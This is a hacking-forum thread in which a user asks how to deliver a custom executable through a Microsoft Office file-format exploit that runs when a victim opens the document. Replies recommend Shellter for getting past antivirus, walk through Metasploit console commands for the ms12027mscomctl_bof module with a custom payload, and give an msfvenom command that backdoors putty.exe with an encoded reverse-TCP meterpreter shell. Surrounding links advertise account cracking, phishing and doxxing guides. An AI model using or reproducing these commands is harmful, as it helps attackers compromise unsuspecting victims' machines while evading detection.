I have my exploit already but I don't want to use any meterpreter payload. I want to use putty.exe as for example. How would I do that?
Basically the exploit I am using is an Microsoft Office exploit how it works is when the target opens the doc file the payload executes.
Forum Thread:
Gaining Access into the Victim's Whatsapp on Android
12
Replies
Forum Thread:
Whatsapp Hack?
19
Replies
Forum Thread:
HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)
12
Replies
Forum Thread:
Hydra Syntax Issue Stops After 16 Attempts
2
Replies
Forum Thread:
Hack Instagram Account Using BruteForce
208
Replies
Forum Thread:
Metasploit reverse_tcp Handler Problem
47
Replies
Forum Thread:
How to Train to Be an IT Security Professional (Ethical Hacker)
22
Replies
Metasploit Error:
Handler Failed to Bind
41
Replies
Forum Thread:
How to Hack Android Phone Using Same Wifi
21
Replies
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
177
Replies
How to:
Crack Instagram Passwords Using Instainsane
36
Replies
Forum Thread:
How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More
5
Replies
Forum Thread:
How Many Hackers Have Played Watch_Dogs Game Before?
13
Replies
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
55
Replies
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
10
Replies
Forum Thread:
How to Run and Install Kali Linux on a Chromebook
18
Replies
Forum Thread:
How to Find Admin Panel Page of a Website?
13
Replies
Forum Thread:
can i run kali lenux in windows 10 without reboting my computer
4
Replies
Forum Thread:
How to Hack School Website
11
Replies
Forum Thread:
Make a Phishing Page for Harvesting Credentials Yourself
8
Replies
How To:
Dox Anyone
How To:
Crack SSH Private Key Passwords with John the Ripper
BT Recon:
How to Snoop on Bluetooth Devices Using Kali Linux
How To:
Find Passwords in Exposed Log Files with Google Dorks
How To:
Hack Coin-Operated Laudromat Machines for Free Wash & Dry Cycles
The Hacks of Mr. Robot:
How to Hide Data in Audio Files
How To:
Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
How To:
Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
How To:
Exploit EternalBlue on Windows Server with Metasploit
How To:
Enumerate SMB with Enum4linux & Smbclient
How To:
Find Vulnerable Webcams Across the Globe Using Shodan
How To:
Use SQL Injection to Run OS Commands & Get a Shell
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
How To:
Automate Wi-Fi Hacking with Wifite2
How To:
Target Bluetooth Devices with Bettercap
How To:
Scan Websites for Interesting Directories & Files with Gobuster
How To:
Exploit WebDAV on a Server & Get a Shell
How To:
Hack Wi-Fi Networks with Bettercap
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
6 Responses
Shellter is good for this. It encrypts the file, so it can get past most AVs (mine wasn't detected by any), and if you have a normal, non-malicious .exe, I'm pretty sure it will still work, but it will also create a connection. Here is an article talking about its usage:
https://null-byte.wonderhowto.com/how-to/create-undetectable-trojan-using-domain-name-0171563/
I want to add a exe to my document file I am using this exploit
odule options (exploit/windows/fileformat/ms12027mscomctl_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
Exploit target:
Id Name
-- ----
0 Microsoft Office 2007 no-SP/SP1/SP2/SP3 English on Windows XP SP3 / 7 SP1 English
msf exploit(ms12027mscomctl_bof) > set FILENAME test.doc
FILENAME => test.doc
msf exploit(ms12027mscomctl_bof) > show options
Module options (exploit/windows/fileformat/ms12027mscomctl_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME test.doc yes The file name.
Exploit target:
Id Name
-- ----
0 Microsoft Office 2007 no-SP/SP1/SP2/SP3 English on Windows XP SP3 / 7 SP1 English
msf exploit(ms12027mscomctl_bof) > use payload/generic/custom
msf payload(custom) > show options
Module options (payload/generic/custom):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOADFILE no The file to read the payload from
PAYLOADSTR no The string to use as a payload
msf payload(custom) > set PAYLOAD FILE /root/Downloads/putty.exe
msf payload(custom) > /root/Downloads/putty.exe
* exec: /root/Downloads/putty.exe
Oh, I misunderstood what you wanted to do.
set PAYLOAD generic/custom
set PAYLOADFILE /path/to/payload
try this command instead of "set PAYLOAD":
set EXE /root/Downloads/putty.exe
I'm not sure though, but give it a shot, maybe it's your lucky day
You could do msfvenom -p windows/meterpreter/reversetcp lhost=192.168.1.2 lport=4444 -e x86/shikataga_nai -i 20 -t putty.exe
Share Your Thoughts